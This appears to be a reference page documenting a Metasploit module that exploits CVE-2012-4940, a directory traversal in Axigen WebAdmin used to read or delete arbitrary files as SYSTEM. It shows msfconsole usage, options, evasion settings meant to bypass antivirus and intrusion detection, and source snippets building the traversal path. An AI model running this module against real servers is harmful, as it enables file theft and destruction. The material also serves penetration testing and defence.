Axigen Arbitrary File Read and Delete - Metasploit


This page contains detailed information about how to use the auxiliary/admin/http/axigen_file_access metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Axigen Arbitrary File Read and Delete
Module: auxiliary/admin/http/axigen_file_access
Source code: modules/auxiliary/admin/http/axigen_file_access.rb
Disclosure date: 2012-10-31
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888, 9000
List of CVEs: CVE-2012-4940

This module exploits a directory traversal vulnerability in the WebAdmin interface of Axigen, which allows an authenticated user to read and delete arbitrary files with SYSTEM privileges. The vulnerability is known to work on Windows platforms. This module has been tested successfully on Axigen 8.10 over Windows 2003 SP2.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


msf > use auxiliary/admin/http/axigen_file_access
msf auxiliary(axigen_file_access) > show targets
    ... a list of targets ...
msf auxiliary(axigen_file_access) > set TARGET target-id
msf auxiliary(axigen_file_access) > show options
    ... show and set options ...
msf auxiliary(axigen_file_access) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

  • PASSWORD: The password to authenticate with

Go back to menu.

Msfconsole Usage


Here is how the admin/http/axigen_file_access auxiliary module looks in the msfconsole:

msf6 > use auxiliary/admin/http/axigen_file_access

msf6 auxiliary(admin/http/axigen_file_access) > show info

       Name: Axigen Arbitrary File Read and Delete
     Module: auxiliary/admin/http/axigen_file_access
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2012-10-31

Provided by:
  Zhao Liang
  juan vazquez <[email protected]>

Available actions:
  Name    Description
  ----    -----------
  Delete  Delete remote file
  Read    Read remote file

Check supported:
  No

Basic options:
  Name       Current Setting   Required  Description
  ----       ---------------   --------  -----------
  DEPTH      4                 yes       Traversal depth if absolute is set to false
  PASSWORD                     yes       The password to authenticate with
  PATH       \windows\win.ini  yes       The file to read or delete
  Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      9000              yes       The target port (TCP)
  SSL        false             no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                 yes       Path to Axigen WebAdmin
  USERNAME   admin             yes       The user to authenticate as
  VHOST                        no        HTTP server virtual host

Description:
  This module exploits a directory traversal vulnerability in the 
  WebAdmin interface of Axigen, which allows an authenticated user to 
  read and delete arbitrary files with SYSTEM privileges. The 
  vulnerability is known to work on Windows platforms. This module has 
  been tested successfully on Axigen 8.10 over Windows 2003 SP2.

References:
  https://www.kb.cert.org/vuls/id/586556
  https://nvd.nist.gov/vuln/detail/CVE-2012-4940
  OSVDB (86802)

Module Options


This is a complete list of options available in the admin/http/axigen_file_access auxiliary module:

msf6 auxiliary(admin/http/axigen_file_access) > show options

Module options (auxiliary/admin/http/axigen_file_access):

   Name       Current Setting   Required  Description
   ----       ---------------   --------  -----------
   DEPTH      4                 yes       Traversal depth if absolute is set to false
   PASSWORD                     yes       The password to authenticate with
   PATH       \windows\win.ini  yes       The file to read or delete
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      9000              yes       The target port (TCP)
   SSL        false             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                 yes       Path to Axigen WebAdmin
   USERNAME   admin             yes       The user to authenticate as
   VHOST                        no        HTTP server virtual host

Auxiliary action:

   Name  Description
   ----  -----------
   Read  Read remote file

Advanced Options


Here is a complete list of advanced options supported by the admin/http/axigen_file_access auxiliary module:

msf6 auxiliary(admin/http/axigen_file_access) > show advanced

Module advanced options (auxiliary/admin/http/axigen_file_access):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the admin/http/axigen_file_access module can do:

msf6 auxiliary(admin/http/axigen_file_access) > show actions

Auxiliary actions:

   Name    Description
   ----    -----------
   Delete  Delete remote file
   Read    Read remote file

Evasion Options


Here is the full list of possible evasion options supported by the admin/http/axigen_file_access auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(admin/http/axigen_file_access) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Login failed, review USERNAME and PASSWORD options


Here is a relevant code snippet related to the "Login failed, review USERNAME and PASSWORD options" error message:

50:	  def run
51:	    print_status("Trying to login")
52:	    if login
53:	      print_good("Login Successful")
54:	    else
55:	      print_error("Login failed, review USERNAME and PASSWORD options")
56:	      return
57:	    end
58:	
59:	    @traversal = "../" * 10
60:	    file = datastore['PATH']

*nix platform detected, vulnerability is only known to work on Windows


Here is a relevant code snippet related to the "*nix platform detected, vulnerability is only known to work on Windows" error message:

62:	
63:	    if @platform == 'windows'
64:	      @traversal.gsub!(/\//, "\\")
65:	      file.gsub!(/\//, "\\")
66:	    else # unix
67:	      print_error("*nix platform detected, vulnerability is only known to work on Windows")
68:	      return
69:	    end
70:	
71:	    case action.name
72:	      when 'Read'

Failed to retrieve file


Here is a relevant code snippet related to the "Failed to retrieve file" error message:

93:	
94:	    if res and res.code == 200 and res.headers['Content-Type'] and res.body.length > 0
95:	      store_path = store_loot("axigen.webadmin.data", "application/octet-stream", rhost, res.body, file)
96:	      print_good("File successfully retrieved and saved on #{store_path}")
97:	    else
98:	      print_error("Failed to retrieve file")
99:	    end
100:	  end
101:	
102:	  def delete_file(file)
103:	    print_status("Deleting file #{file}")

Error deleting file <FILE>


Here is a relevant code snippet related to the "Error deleting file <FILE>" error message:

116:	    })
117:	
118:	    if res and res.code == 200 and res.body =~ /View Log Files/
119:	      print_good("File #{file} deleted")
120:	    else
121:	      print_error("Error deleting file #{file}")
122:	    end
123:	  end
124:	
125:	  def get_platform
126:	    print_status("Retrieving platform")

Platform not found, assuming UNIX flavor


Here is a relevant code snippet related to the "Platform not found, assuming UNIX flavor" error message:

143:	        print_good("Linux platform found")
144:	        return 'unix'
145:	      end
146:	    end
147:	
148:	    print_warning("Platform not found, assuming UNIX flavor")
149:	    return 'unix'
150:	  end
151:	
152:	  def login
153:	    res = send_request_cgi(

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Zhao Liang
  • juan vazquez

Version


This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.